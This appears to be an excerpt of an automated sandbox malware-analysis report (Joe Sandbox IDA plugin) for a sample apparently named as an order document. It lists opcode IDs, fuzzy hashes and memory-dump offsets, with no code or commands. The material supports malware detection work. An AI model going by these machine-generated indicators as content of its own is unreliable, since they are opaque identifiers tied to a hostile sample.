                                                                  • API String ID:
                                                                  • Opcode ID: 0099acc63c948e979d84d2208996b13890d3172a1f59305e78e54f50f837c67f
                                                                  • Instruction ID: 1d34c7ee164bf6e0da5742b2c298fbfcb466dbb72a77ec2e1fcacf0d7d4429ce
                                                                  • Opcode Fuzzy Hash: 0099acc63c948e979d84d2208996b13890d3172a1f59305e78e54f50f837c67f
                                                                  • Instruction Fuzzy Hash: CF1166B6600704AFE7218F69C941B9B77F8EB44348F018829E9958B310DB75E841CBB1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f0c1ac5de9459c657eca712eded564d942344e84b10664ecc619bb6c973593d9
                                                                  • Instruction ID: f003669bcbeb1d97cb5a622b0e3d605d897169743b826ebcc4c06c0b9901fe20
                                                                  • Opcode Fuzzy Hash: f0c1ac5de9459c657eca712eded564d942344e84b10664ecc619bb6c973593d9
                                                                  • Instruction Fuzzy Hash: 78110E75A007489FE710CF68C884F9EB7A8FF45700F64046AE941EB741DBB8D901C760
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                  • Instruction ID: 5153a8adddf134ff49e75311c937cec9322df86c2ae07c3538c43d8ed5914a8b
                                                                  • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                  • Instruction Fuzzy Hash: 8401DEB6140549BFE7019F2ACC80E62FB6EFF80394F904525F250436A0CB71ACA0CAB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction ID: ba8cf7b636d45c98456859af6c1cb9cf2fd584960f1ccdd772f26b8a2bfe7cec
                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction Fuzzy Hash: 1501D6755057119FD7208F15D840A267BA5EF55764B11C92DFC958B780DB35D400CB70
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 19e3ed3b2e27c2af7c13a2c46a5efc430801240711592ac2eb6a6b8e540cacb7
                                                                  • Instruction ID: b3d2c26ff0164cc00c06f828e1df122ebb2d3f037be86cd9fcf17e3717fea48a
                                                                  • Opcode Fuzzy Hash: 19e3ed3b2e27c2af7c13a2c46a5efc430801240711592ac2eb6a6b8e540cacb7
                                                                  • Instruction Fuzzy Hash: 1A117C70542228ABEBA5DF68CC46FD9B374FF04710F5081D4A318A62E0DBB09E81CF98
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction ID: 1110c8bf5bcfc4d8bf2c57f8eb7dd666d12f0f714bc06232ffaff85ad6843e94
                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction Fuzzy Hash: 66012836A022108FEB068A19D884B467766FFC4700FA540A5EE408F349DEB1DC81C7A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b7a2d62fd41a734376c3906dbd4e54724f62a9c96c37b9d4aceb9b6fd3ab6a64
                                                                  • Instruction ID: c62a40396a8a60cb53387a3aed7327308f88464da9dc0773b5ec0976b4c9dd60
                                                                  • Opcode Fuzzy Hash: b7a2d62fd41a734376c3906dbd4e54724f62a9c96c37b9d4aceb9b6fd3ab6a64
                                                                  • Instruction Fuzzy Hash: 87115735A01248ABEB05DFA8C855F9E7BB5FF48740F004059E9419B390DA79AA11CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction ID: 2e11ec0d61057fa38a3c82448c3531202f1ccbe6101c5796beb47c35a2cc4e4f
                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction Fuzzy Hash: 1501F5321007449FEB229666C900BA773E9FFC5398F51841AA9858BB44DEB1E802CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                  • Instruction ID: 29c028e0a59a6d5c18f9dfb84a72cb3b79f2980d0932ac8435fddcdcd12ab453
                                                                  • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                  • Instruction Fuzzy Hash: 5811D272400B01CFE3219F15C980B52B3E4FF407AAF25C86CE4CA4B6A5CB74E880CB10
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                  • Instruction ID: 01ec5a27099bc4f8d7feb2a7fc00739dc13b37ce76ce085339b3175e92394ba7
                                                                  • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                  • Instruction Fuzzy Hash: 55018672700205A7CF56CA9ADD40E9F7A6C9F84789F614029B915DB760EFB0D905C760
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                  • Instruction ID: 369baac1d86c5852376c354ee7b5de1e3386587d9ca0485c4fbddbf841068fed
                                                                  • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                  • Instruction Fuzzy Hash: 8601D4B6A112449BE701CA54F800F6573A9EF88728FA0C115FE549B388DF74D901C791
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 51ae92fd939a7795e96faa1d9d2046d5bdb9bd2288be1ef4018f7a178d5b56c9
                                                                  • Instruction ID: 49a8634979300553fe3fa4e0a241c366f3ebf1f171d91aba1068c6ced4b80c72
                                                                  • Opcode Fuzzy Hash: 51ae92fd939a7795e96faa1d9d2046d5bdb9bd2288be1ef4018f7a178d5b56c9
                                                                  • Instruction Fuzzy Hash: 38018F71600704EFDB04DB6AE911AAE77B9AF80B58F558069D803E7740EE60DD42C6B1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction ID: 8eebbc2a60504f68edd525fcc33015049ffb08813d94812a66278e1628aa4fa2
                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction Fuzzy Hash: 22017C72200680AFE3128619C944F6677D8EF45794F1904A1FC95CBB92DE68EC40C661
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e24f1c2518dba06b9b29e246a8541cefe2b94f1c70c541bc96e58c0f2c8d29d7
                                                                  • Instruction ID: 97a5d4d6b505b6405abf825cd678081472bd3a650b3fb36b6a328aa58445d630
                                                                  • Opcode Fuzzy Hash: e24f1c2518dba06b9b29e246a8541cefe2b94f1c70c541bc96e58c0f2c8d29d7
                                                                  • Instruction Fuzzy Hash: E7017C71A10358ABDB04DFA9D815FAEBBB8EF44744F50406AF541EB380DAB8D901C7A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                  • Instruction ID: 69fd65949b9509071451dcc1f0ba4055373e7bb401297fc400179124f288d4cb
                                                                  • Opcode Fuzzy Hash: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                  • Instruction Fuzzy Hash: 29019A77A00628DBCB18CF19C990BADB7B6AF44350F2400B9DC4AA7344DBB1AE00CA94
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3f4a626b1b04c79529e9f3b5539b415ab1d85e14a5ac930f0bed0a5c3a3063a
                                                                  • Instruction ID: 9166b9e31f2fdfca337d3029df2b6e28633927905937bf33ebb785cbfc0eac2c
                                                                  • Opcode Fuzzy Hash: d3f4a626b1b04c79529e9f3b5539b415ab1d85e14a5ac930f0bed0a5c3a3063a
                                                                  • Instruction Fuzzy Hash: C4118074D10249EFCB04DFA9D441A9EB7B4FF08704F50845AB814EB340DB74DA02CB65
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                  • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                  • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                  • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                  • Instruction ID: 6b94c7ece36b7edf9b6924403f0c26ca152c61893dc0a950aa63ebef773de25d
                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                  • Instruction Fuzzy Hash: 3CF04677244B229FD3320B598940B5B66998FC9BECF270035E1889B304CEA28C02E3E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb1aab2824d073060974f9b5f755bf065e82cea0604a6835dab03ea6873180aa
                                                                  • Instruction ID: d9d4a59e1b063e7e9f274bc9df254c867e10e97e51675cbc196d83be468d17b4
                                                                  • Opcode Fuzzy Hash: cb1aab2824d073060974f9b5f755bf065e82cea0604a6835dab03ea6873180aa
                                                                  • Instruction Fuzzy Hash: C3012CB1A00309ABDB04DFA9D941ADEB7B8FF48744F50845AF500F7380DA74AD018BA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb6e828749af468277ce96012640c71843166adc2b26115cbfabaf3c55669b19
                                                                  • Instruction ID: 9418fa39ec085d7578e87d88110c35b8dc4c75ece16f65d295370c2b44a95ac8
                                                                  • Opcode Fuzzy Hash: cb6e828749af468277ce96012640c71843166adc2b26115cbfabaf3c55669b19
                                                                  • Instruction Fuzzy Hash: 270171B1A003099BDB04DF69D941ADEB7B8FF48304F50405AF500F7341DA74A901CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction ID: 1f66571511fec130a601e672f7a49cf0dac518b770bd25dd59eb5b68c1f41eb5
                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction Fuzzy Hash: 99F0AFB2600611ABD324CF4DD840E57F7EADFC0A80F148128A505C7320EA71DD04CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 92473d8f452bd0aa3e05efd48778e2aca14685ca1b41112143e8e4e858f68483
                                                                  • Instruction ID: b8fbe3911c4d87302e3fa787ad52e47821a97c9ab00ef0e1b6e962b5bc8f9df1
                                                                  • Opcode Fuzzy Hash: 92473d8f452bd0aa3e05efd48778e2aca14685ca1b41112143e8e4e858f68483
                                                                  • Instruction Fuzzy Hash: A7012CB1A10209ABDB04DFA9D951ADEBBB8FF48704F50405AF900F7340DB74AA01CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                  • Instruction ID: 70c611295e7bfaac04ebbe53befee3fe9a83a8bdafbb1fc3755320211f494604
                                                                  • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                  • Instruction Fuzzy Hash: 77F0FF72A01215AFE319CF5CC880F6AB7EDEB45698F4140B9D900DB230EAB1DE04CAA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41591e48abc305d289c844a223004732e060a54942d8acd04aadf55d98e7a54c
                                                                  • Instruction ID: 6cc7a6b72071900a47494174560d3411e79438505d7752194f1c2984c01dfbf5
                                                                  • Opcode Fuzzy Hash: 41591e48abc305d289c844a223004732e060a54942d8acd04aadf55d98e7a54c
                                                                  • Instruction Fuzzy Hash: 89014CB4E00709AFDB44DFA9C541A9EBBF4EF08344F10802AA845EB340EA74DA00CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c8bd84f4c8a09e1aa53e6425eae065436b8d147a9ef86ba48b3c41bd6909298
                                                                  • Instruction ID: 8de19740059539a4e9ff1aeb3b5e65dca160f553fa090f5b6be653f783bc2253
                                                                  • Opcode Fuzzy Hash: 4c8bd84f4c8a09e1aa53e6425eae065436b8d147a9ef86ba48b3c41bd6909298
                                                                  • Instruction Fuzzy Hash: 08F0A472A10348AFDB04DFB9C805A9EB7B8EF44750F40805AE541EB380DEB4D9018761
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
